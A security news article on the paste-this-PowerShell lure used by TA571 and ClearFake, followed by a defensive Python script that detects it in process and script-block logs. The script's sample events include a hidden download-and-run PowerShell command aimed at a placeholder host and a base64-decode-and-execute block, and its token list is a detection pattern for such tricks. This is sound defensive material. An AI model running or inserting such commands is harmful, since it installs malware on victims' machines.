Cybercriminals use new social engineering tactic for running PowerShell and installing malware

A threat actor known as TA571 and the ClearFake activity cluster have been observed employing an innovative social engineering technique designed to manipulate users into executing malicious PowerShell scripts and infecting victim devices with malware.

The technique, detailed by Proofpoint researchers, involves directing users to copy and paste malicious PowerShell scripts that lead to the deployment of various malicious tools, including DarkGate, Matanbuchus, NetSupport, and several information stealers.

Regardless of whether the initial campaign starts via malicious spam (malspam) or web browser injects, the technique follows a similar pattern. Users are presented with a pop-up message displaying an error while trying to open a document or webpage. Instructions are then provided to copy and paste a script into either the PowerShell terminal or the Windows Run dialog box, triggering the execution of the malicious script.

Proofpoint first observed TA571 employing this technique in March 2024, and the ClearFake cluster began using it in early April. ClearFake campaigns involve compromising legitimate websites with malicious HTML and JavaScript, presenting users with fake browser update prompts.

When users visit a compromised site, an injection loads a malicious script hosted on the blockchain via Binance’s Smart Chain contracts—a method known as “EtherHiding.” This script loads a second script from a domain using Keitaro TDS for filtering. If the victim continues to browse the site, they see a fake warning overlay instructing them to install a “root certificate.” Following the instructions leads to executing a PowerShell script.
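The lure in both the TA571 and ClearFake chains ends the same way: the victim pastes a command into the Run dialog or a PowerShell window. The following detection sketch is an added example written for this page; it is not Proofpoint's or the article's own tooling. It scores two kinds of constructed telemetry: process-creation events (a command typed into Win+R shows up as a PowerShell host whose parent is explorer.exe) and PowerShell script-block events (a command pasted into an already-open PowerShell window never reaches a process command line, only the 4104 script-block text). Field names (`Image`, `ParentImage`, `CommandLine`, `ScriptBlockText`, `Path`), the token list, the weights and the threshold are assumptions chosen for the example, and the sample events, URL and base64 string are constructed placeholders.

```python
import re
from dataclasses import dataclass, field

# Tokens that recur in "paste this to fix the error" lures: hidden window,
# encoded command, download-and-run one-liners. Labels are assumptions.
SUSPICIOUS_TOKENS = {
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "encoded command": r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",
    "web download": r"\biwr\b|invoke-webrequest|downloadstring|downloadfile",
    "in-memory execution": r"\biex\b|invoke-expression",
    "base64 decode": r"frombase64string",
}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ALERT_THRESHOLD = 3  # assumed tuning value for this example


@dataclass
class Finding:
    event_id: str
    score: int
    reasons: list = field(default_factory=list)


def token_hits(text):
    """Return the labels of suspicious tokens present in a command or script."""
    return [label for label, pat in SUSPICIOUS_TOKENS.items()
            if re.search(pat, text, re.IGNORECASE)]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(ev):
    """Score a process-creation event (Sysmon EID 1 / Security 4688 style)."""
    if _basename(ev.get("Image", "")) not in POWERSHELL_HOSTS:
        return None
    reasons, score = [], 0
    # A command typed into Win+R runs as a child of explorer.exe, exactly like
    # a user opening PowerShell from the Start menu, so this alone stays below
    # the alert threshold; the command-line tokens decide.
    if _basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("PowerShell host spawned by explorer.exe (Run dialog / shell)")
        score += 2
    hits = token_hits(ev.get("CommandLine", ""))
    return Finding(ev["EventId"], score + len(hits), reasons + hits)


def score_scriptblock_event(ev):
    """Score a PowerShell script-block event (EID 4104 style)."""
    reasons, score = [], 0
    # 4104 leaves Path empty when the block was typed or pasted at the prompt
    # rather than loaded from a .ps1 file.
    if not ev.get("Path"):
        reasons.append("interactive script block (no source file)")
        score += 1
    hits = token_hits(ev.get("ScriptBlockText", ""))
    return Finding(ev["EventId"], score + len(hits), reasons + hits)


def detect(events):
    """Return Findings that reach ALERT_THRESHOLD, in input order."""
    alerts = []
    for ev in events:
        if ev["Type"] == "process":
            f = score_process_event(ev)
        elif ev["Type"] == "scriptblock":
            f = score_scriptblock_event(ev)
        else:
            f = None
        if f and f.score >= ALERT_THRESHOLD:
            alerts.append(f)
    return alerts


# Constructed sample telemetry; the URL and base64 payload are placeholders.
SAMPLE_EVENTS = [
    {"Type": "process", "EventId": "ev1",  # pasted into the Run dialog
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iex (iwr 'http://example.invalid/fix.ps1' -UseBasicParsing)\""},
    {"Type": "process", "EventId": "ev2",  # user opening PowerShell normally
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"Type": "scriptblock", "EventId": "ev3", "Path": "",  # pasted at the prompt
     "ScriptBlockText": "$c=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('QUFBQUFBQUFBQUFBQUFBQUFBQUE=')); iex $c"},
    {"Type": "scriptblock", "EventId": "ev4", "Path": r"C:\tools\Deploy.ps1",  # admin script
     "ScriptBlockText": "Invoke-WebRequest -Uri https://intranet.example/pkg.zip -OutFile pkg.zip"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.event_id, f.score, "; ".join(f.reasons))
```

Running the block flags ev1 (explorer.exe parent plus hidden window, download and in-memory execution) and ev3 (interactive block that base64-decodes and runs text), while a plain PowerShell launch from the shell and a download step inside a deployed .ps1 stay below the threshold. The two-source design matters because the lure works whether the victim uses the Run dialog or a terminal: a team that only watches process command lines misses the terminal case entirely, so script-block logging should be enabled alongside process auditing.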
